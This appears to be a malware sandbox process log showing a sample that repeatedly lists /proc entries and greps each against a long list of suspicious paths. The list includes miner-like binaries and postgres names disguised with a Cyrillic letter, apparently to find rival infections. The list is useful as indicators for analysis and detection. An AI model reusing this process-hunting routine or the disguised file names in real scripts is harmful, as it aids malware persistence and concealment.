/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:860
-
-
/bin/grepgrep exe2⤵PID:863
-
-
/bin/lsls -latrh /proc/202⤵PID:862
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:865
-
-
/bin/lsls -latrh /proc/212⤵PID:867
-
-
/bin/grepgrep exe2⤵PID:868
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:870
-
-
/bin/grepgrep exe2⤵PID:873
-
-
/bin/lsls -latrh /proc/222⤵PID:872
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:875
-
-
/bin/grepgrep exe2⤵PID:878
-
-
/bin/lsls -latrh /proc/232⤵PID:877
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:880
-
-
/bin/grepgrep exe2⤵PID:883
-
-
/bin/lsls -latrh /proc/2362⤵PID:882
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:885
-
-
/bin/grepgrep exe2⤵PID:888
-
-
/bin/lsls -latrh /proc/242⤵PID:887
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:890
-
-
/bin/grepgrep exe2⤵PID:893
-
-
/bin/lsls -latrh /proc/2552⤵PID:892
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:895
-
-
/bin/grepgrep exe2⤵PID:898
-
-
/bin/lsls -latrh /proc/32⤵PID:897
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:900
-
-
/bin/grepgrep exe2⤵PID:903
-
-
/bin/lsls -latrh /proc/3322⤵PID:902
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:905
-
-
/bin/grepgrep exe2⤵PID:908
-
-
/bin/lsls -latrh /proc/3342⤵PID:907
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:910
-
-
/bin/grepgrep exe2⤵PID:913
-
-
/bin/lsls -latrh /proc/362⤵PID:912
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:915
-
-
/bin/grepgrep exe2⤵PID:918
-
-
/bin/lsls -latrh /proc/3602⤵PID:917
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:920
-
-
/bin/lsls -latrh /proc/3622⤵PID:922
-
-
/bin/grepgrep exe2⤵PID:923
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:925
-
-
/bin/grepgrep exe2⤵PID:928
-
-
/bin/lsls -latrh /proc/3642⤵PID:927
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:932
-
-
/bin/grepgrep exe2⤵PID:935
-
-
/bin/lsls -latrh /proc/372⤵PID:934
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:939
-
-
/bin/grepgrep exe2⤵PID:942
-
-
/bin/lsls -latrh /proc/3812⤵PID:941
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:945
-
-
/bin/grepgrep exe2⤵PID:949
-
-
/bin/lsls -latrh /proc/3842⤵PID:948
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:952
-
-
/bin/grepgrep exe2⤵PID:955
-
-
/bin/lsls -latrh /proc/3912⤵PID:954
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:958
-
-
/bin/grepgrep exe2⤵PID:962
-
-
/bin/lsls -latrh /proc/42⤵PID:961
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:965
-
-
/bin/grepgrep exe2⤵PID:968
-
-
/bin/lsls -latrh /proc/4202⤵PID:967
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:972
-
-
/bin/grepgrep exe2⤵PID:975
-
-
/bin/lsls -latrh /proc/52⤵PID:974
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:977
-
-
/bin/grepgrep exe2⤵PID:982
-
-
/bin/lsls -latrh /proc/62⤵PID:980
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:984
-
-
/bin/grepgrep exe2⤵PID:987
-
-
/bin/lsls -latrh /proc/6742⤵PID:986
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:990
-
-
/bin/grepgrep exe2⤵PID:994
-
-
/bin/lsls -latrh /proc/6772⤵PID:993
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:996
-
-
/bin/grepgrep exe2⤵PID:999
-
-
/bin/lsls -latrh /proc/6802⤵PID:998
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1003
-
-
/bin/grepgrep exe2⤵PID:1009
-
-
/bin/lsls -latrh /proc/6812⤵PID:1008
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1012
-
-
/bin/grepgrep exe2⤵PID:1015
-
-
/bin/lsls -latrh /proc/692⤵PID:1014
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1018
-
-
/bin/grepgrep exe2⤵PID:1022
-
-
/bin/lsls -latrh /proc/72⤵PID:1021
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1024
-
-
/bin/grepgrep exe2⤵PID:1028
-
-
/bin/lsls -latrh /proc/702⤵PID:1027
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1031
-
-
/bin/grepgrep exe2⤵PID:1034
-
-
/bin/lsls -latrh /proc/7162⤵PID:1033
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1038
-
-
/bin/grepgrep exe2⤵PID:1044
-
-
/bin/lsls -latrh /proc/722⤵PID:1043
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1047
-
-
/bin/grepgrep exe2⤵PID:1050
-
-
/bin/lsls -latrh /proc/7272⤵PID:1049
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1053
-
-
/bin/grepgrep exe2⤵PID:1058
-
-
/bin/lsls -latrh /proc/7282⤵PID:1057
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1061
-
-
/bin/grepgrep exe2⤵PID:1066
-
-
/bin/lsls -latrh /proc/732⤵PID:1065
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1068
-
-
/bin/grepgrep exe2⤵PID:1072
-
-
/bin/lsls -latrh /proc/7322⤵PID:1071
-
-
